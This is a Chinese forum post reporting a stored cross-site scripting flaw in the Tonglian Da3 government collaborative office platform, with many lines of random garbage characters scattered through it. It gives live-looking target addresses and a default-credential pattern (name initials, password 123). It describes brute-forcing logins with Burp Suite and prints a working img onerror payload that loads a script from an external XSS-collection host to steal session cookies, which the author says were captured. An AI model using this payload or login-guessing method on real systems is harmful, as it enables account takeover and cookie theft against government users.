( I* h3 o4 x1 V, h 6 s& d+ P6 g, p$ |0 X/ t
同联Da3协同办公平台后台通用储存型xss漏洞# h H8 M% f1 q6 C
2 n5 d! J- G+ F
6 N9 H# ?! V0 S" p6 Q [
平台简介:
; \ \5 }, }- D0 a+ F; d( ~
( V2 F8 y0 |; u8 y, G5 e 2 @: u# e5 X, `3 i' c9 c4 l" s5 u1 v
% F @+ N) J% ?( w3 h. b0 ]
, C0 ]# g1 t) @3 b/ G" i
% q# E# }5 W8 \* y1 b9 b8 _ 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
/ q4 S, [0 }4 k# i& M& r同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
# U( \8 u* W& J& P- h" d
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
( a2 U' {% U7 D3 L
: O M# \( z) |" j7 X+ _ " e( ]2 k/ d' a
- R# m5 J/ Y& f: p; n
5 a2 [2 ^9 G9 `
* Z* ~5 k: ?$ s5 ?' [ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:& e5 ]& X0 ^' V2 V
# n; E( n4 L0 F5 C: x- v3 v! N* r" V
3 k, h3 d- V; \5 L* O# r* N$ w% I
. \1 m% d6 ]1 h
$ _- a8 n5 z; F7 P* T$ k. X# h " o/ `7 m( L' S0 i
http://1.1.1.1:7197/cap-aco/#(案例2-)
y# h; n; f/ t6 c! C
2 ?6 m% `2 x4 D" l* J6 Q6 R * y8 b; f# K" x- Q t; q8 H
http://www.XXOO.com (案例1-官网网站)
& b" h6 w# \7 j5 n' x B
8 _" E* q. z6 A6 @- W
# ^3 Q, _/ m* ^
漏洞详情:
7 }( t4 S3 u5 C6 Y+ ^9 c8 s6 I
! Z6 ?# y& K! V( X9 v, y0 Q
: ^2 R; s' l8 x" Y 案例一、
1 ?, k% W* {; y
* I0 k4 o0 P- a. r% }- G
3 Q- g, @" u+ e& _/ L$ R 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
; S$ I6 w) e' f. d+ o
9 X9 ]6 h* c! E) H* ^( Y; y
9 }7 K ~' B- b. @, [) P/ R 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:! _0 f6 x8 d+ [( w
6 b! |! T! t i- j1 |0 A) J' Y- c6 R1 K ' z# K: b8 @3 N+ m
# c( S/ i8 k3 O b. m1 h% o
3 L% @/ w8 C. d# B
' d2 O% U& _2 @& [% O( n9 h3 Q 
, E8 j' M4 j+ _- U- s6 k
( ~4 o7 ]7 g+ c Z8 n5 E 8 ~1 [6 u1 Y c2 U' I- _; a e
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
4 T! ^2 H7 h$ h7 B; Z
: X* ?) I u* e: Q8 w. t8 A8 j
, R& t$ N6 K6 _/ ]
; s8 @- ~0 i2 ^0 Z' p0 O8 N% X1 i
. H/ g" [! k% J9 g0 F/ W
5 K6 W* W# d+ N( {2 D. ]) X 
3 t+ Q0 y' X! a
) O5 [! t5 b* X 2 c' V$ o; |- q( M0 T
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
d7 v0 g9 \) i, H
' S1 g& A8 b1 L6 Z! {' A
- Q/ v; o+ _1 H
, E/ Q/ Z* u. e6 k2 l+ l
" D! v/ Q+ s* x; q/ h# K
: g: C. V/ E! E* W <img src=x* ]) S/ G3 w( {: ^" Z
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
1 {/ ?) {( F; g7 W3 a) k: f
+ A: F; B. ~ U% l& K) v5 j: Q( ^" E
' D j& X' H( j8 b8 B8 p4 N
) c- Q( y4 V7 h+ N9 U4 z
/ M$ W8 q g7 Z
8 r _ T* P! r+ A: X
然后发送,接收cookie如图:
/ ?1 r( E0 [* C& q u
% o' E) T4 ^/ ~4 [" k- [% x0 ^3 J* H
$ R4 Q3 [2 h1 X5 W, m; [) h
1 |* i1 L4 T7 L/ `: k- \2 L
- h* V; Z) N+ W+ X1 y2 J
3 p) {0 M3 w4 T. v
( N7 k$ h- }! B& V0 H1 p7 Z
) i0 o1 C6 { D
: j8 S& ]9 W8 F/ D" K
+ ^- @1 l# n2 }* u3 Q7 ~; g
8 G, I! N1 y9 e' m; o: j3 `, F
+ a7 l. X! C! K( i# f4 E5 ^ 4 H8 E1 Y) t0 v, k2 L ]
; F! D' u" e! {. b: S/ C0 W6 t
! H# C7 W1 j8 a0 |6 J9 X; ?. q 
' h4 ?2 u* {3 f2 n/ l: W1 }2 N f
- O7 ^# `9 r/ C
7 r' Q5 O" c0 f 
1 _/ ]8 I7 c8 O0 B7 Y3 D- q
" q- a2 _5 n3 p% ^+ r1 a
7 Z2 i G% u$ b$ n
# T% T; e+ B% O% _/ Z; j
T7 t8 [6 p' Z' T7 a # b* W3 S+ X- N$ |
案例2、
; ]; E% I4 s8 m/ _
4 C$ J, d" B3 ^1 z6 F8 `- T % u2 V+ y3 H, ?2 R5 ]
前面步骤都一样,下面看效果图: ( M L5 a& V" U! Y6 M
/ F0 p" v) T0 l$ `* z% P9 X P c
- H4 `3 Z& W& o+ w 
0 }$ V* C- _( a$ m, D1 k
8 [, r; r, V$ R( D
) Z# O! k$ d) B4 |$ K 
) P4 ^; a6 ?% s; h: _: {' [& [
$ d. O5 L x! T( r: `6 R y, [ # ?$ R. ?3 H% n# F4 M! q
2 \; e8 I5 Y, D, Z
6 k5 D) S* L, o6 L1 k
2 x& m/ `2 A5 A( w1 l! [" P ' \" O( Z9 H! f( I" S
2 O* Q9 s/ p3 p2 ?, ^+ e# N , V* r" z. P9 R# }) e) S
' G/ t1 J- {6 a1 ?, g# j
/ N5 F" ~. d: ]
9 [4 s. B! q* Y. ~ 3 _: y- u' y6 T+ ~; W; I
: z/ g. T% b- { 4 K! {$ _2 e9 P- a8 B
0 W" A9 w: g# E0 ?8 p& Q
4 o% @; q. w) u. x* t; a- @
) @3 ~0 ^; b% t3 c4 ^
/ K5 m- F+ y# j% P
" Y% Y- u4 N! H5 W# H1 U- N) w
+ ~+ L& Z! c1 n) b; P7 {* N O
& A- K/ Z0 \' ~5 B% q
- F3 e, A" L8 k# `5 }7 [' f/ B 
发表于 2018-10-20 20:14:15
收藏
支持
反对